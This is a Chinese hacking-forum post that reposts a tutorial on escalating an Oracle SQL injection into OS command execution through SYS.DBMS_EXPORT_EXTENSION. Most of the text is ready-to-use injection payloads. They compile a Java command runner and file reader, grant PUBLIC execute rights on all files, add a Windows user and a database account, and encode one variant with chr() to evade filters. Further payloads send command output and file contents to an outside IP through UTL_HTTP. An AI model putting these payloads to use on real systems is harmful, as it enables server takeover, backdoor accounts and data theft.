找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2308|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
# O4 q4 x; w: |( l/ C5 @% @& J4 ]0 Y7 u8 F0 A
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
& j+ b8 H; w9 ?8 t. ]的形式即可。(用" 'a'|| "是为了让语句返回true值)
, Y% d0 x2 T8 _6 H  Q' k, `语句有点长,可能要用post提交。
- p* d/ ^" X, B# g( C" L' A以下是各个步骤:
4 D5 n( c$ {5 r7 ^& v1.创建包
& I# b8 \- A4 @# j通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:- G8 `! L# U6 T2 ^3 `
/xxx.jsp?id=1 and '1'<>'a'||(
$ u" `1 O% ?$ T6 Y8 t& qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ J7 X5 d, Z$ G6 ~$ Wcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(; U8 |: p1 G. a6 d$ \6 ~5 p/ J, A
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
# i4 _% w- Q6 `# Q7 [/ w# j}'''';END;'';END;--','SYS',0,'1',0) from dual : f& Z9 R$ P, V! W1 O
) ; ~9 r7 b2 V+ b1 _$ j
------------------------ 2 N5 |4 d8 E! o& a& x3 V( b( N& T
如果url有长度限制,可以把readFile()函数块去掉,即: - g) e- Q% B3 R1 F
/xxx.jsp?id=1 and '1'<>'a'||(
: H6 u7 ?6 i. Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 p  ?# R8 G( Z3 S  V, `* a& Lcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(+ b' I8 K+ M( }& V
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. H* u' }; p+ m) B}'''';END;'';END;--','SYS',0,'1',0) from dual & F; U4 W5 P% x& _
) 1 J8 ]+ _; y, g
同时把后面步骤 提到的 对readFile()的处理语句去掉。
8 \1 y, i7 w/ @$ N------------------------------
  O1 I% |, C7 O8 M3 B+ e0 A* O  o2.赋Java权限 . J. T% o; ~! }3 k1 T/ L2 j
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
) Y9 e* K+ e9 A* j6 u9 z3 v3 T5 l3.创建函数 , t' p9 H) G% Y, X- F# p; W/ |
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# Y$ N/ R7 ?* S  Dcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
2 f- d5 g0 w- o* U( D) Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; {# a) E" |, b  screate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
" f$ b' ^) w  i! C9 w4 S4.赋public执行函数的权限 ) d" d- |( a) s$ p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
/ Q" E" E$ v1 Y: }7 a; k+ \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual3 H6 l4 t0 ~0 k& O: }9 K
5.测试上面的几步是否成功
" E4 ~  B7 e# d) v, Iand '1'<>'11'||(
, i" r" d6 q- U! c1 `2 S* Oselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
1 ^2 {* T6 M1 x% r% u# |) 0 g. [" h& ?1 C
and '1'<>(
8 C. G; u4 H1 mselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'   m3 m9 s! g8 b+ p
) ) A  I# f8 w3 G7 B
6.执行命令: 2 s* H6 c- Z' Q) b& {/ {
/xxx.jsp?id=1 and '1'<>( : I5 V" G4 J6 A" ]. G- S+ B8 s
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 0 `6 F* r3 l* [# z4 {

; f7 R1 V. l) x# @3 s  ]" U)
2 D, ]' o! t+ J$ Z+ {/xxx.jsp?id=1 and '1'<>( 8 s! T% f: X/ w9 ~
select  sys.LinxReadFile('c:/boot.ini') from dual$ V4 a" I, b9 `- c

+ T/ h7 Z- {% o2 s, D: A)
' p* T" F9 c8 {  9 D- {. X% E& }, |! v
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 * H0 G; e% e4 l% P) G5 L, z0 y# O
如果要查看运行结果可以用 union :
$ v* I2 g3 p; D& b# K: B3 K/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual. }# J( e6 k9 X/ \- \
或者UTL_HTTP.request(: 9 h! _" w1 j$ T6 N7 X
/xxx.jsp?id=1 and '1'<>(
5 R. @7 j0 S% A  T- ^1 I0 \SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual; v9 R( \8 ^+ `' W! j' W8 a
) 7 k: Q$ S4 x8 [5 }9 q6 J' G
/xxx.jsp?id=1 and '1'<>(
7 E7 f' Y" |; d5 L: ~! U# j+ ISELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
  {( V4 J" b. v/ V. Z" O)
1 c, n+ J4 @; H5 r2 X& _- `注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。% R5 E/ t9 o: H  s- F' G4 ?" x+ P
-------------------- 6 n1 u8 l  m4 q* d$ w' L
6.内部变化 4 v" k- U7 ]8 e9 N5 ^% s0 G" A
通过以下命令可以查看all_objects表达改变:
; \4 u5 y6 {7 _8 p9 F1 P/ cselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'+ ~( o3 s$ a1 w0 |* d! m/ D
7.删除我们创建的函数
6 k$ t6 A' ?7 p2 F$ uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 n6 A/ G& y- X1 x; s+ m' n7 J
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
: X* a7 ~. c+ u+ `$ v6 b. M. R- W; a; J====================================================
& @9 t' N! z. N) X" g" c1 T) P全文结束。谨以此文赠与我的朋友。 , i8 g2 f0 M5 t' B
linx
; v+ p: T- V' y124829445 7 v' {7 R3 M1 q, L# V+ q& ]& V. A# R$ P
2008.1.12
  h" b$ `. {1 W" h7 qlinyujian@bjfu.edu.cn : X) M, w! D( A6 B. G
====================================================================== , {6 g2 q4 o- h, ?% F$ w1 M/ K5 v% [
测试漏洞的另一方法:
' m& e; `" Z4 b9 C创建oracle帐号:
# s& D, m6 F5 e+ z; W& }" ]: a& |5 Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  F1 B* q; Y' m! X4 b1 `CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual6 J* W7 z5 d5 N/ \0 P- {
即:
( o/ L: C$ J# Y3 i+ zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
* [7 W& Q9 ?' K8 M, t! ?$ _chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
" J; S. w& M2 f- x7 C+ a' ?1 [* O确定漏洞存在:   i- U) k. D4 t* ?1 f+ k
1<>( ! I5 ^/ k0 a3 J: l
select user_id from all_users where username='LINXSQL'
  y, y* T$ X0 d0 ]7 d% b) v)
! O& P- |3 {) Y( V$ T5 Z给linxsql连接权限:
) \+ t0 ^8 N: H' U. uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# s! @% W! M+ T
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
: g4 V. b6 r* p& y删除帐号: 9 n; ~: ^+ x4 `% ]8 e7 ^% P7 i9 P# ~2 A
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! q8 O$ q% i5 f: ^6 Rdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
8 b9 [2 H6 F6 w. S; i======================
- T6 b% e5 Y/ q2 n+ i# c: H以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
& x8 r4 ^8 l( h( ^0 `# r# C5 N1.jsp?id=1 and '1'<>(
: Y- o" m$ G4 \  `) p$ F7 nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, }/ u% [! F% @/ U5 z" h7 s) \create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
8 c8 a+ k" x+ M: P- o4 G5 }) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
3 F" a1 p  D3 i# W! t+ t )3 B7 x# Z. E$ h1 }; `- q- g
& U2 ~6 p" T( a* _% ?9 F' Y

$ f# j* P1 Q1 f) o: `
  |2 T" Y  @- t, A6 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表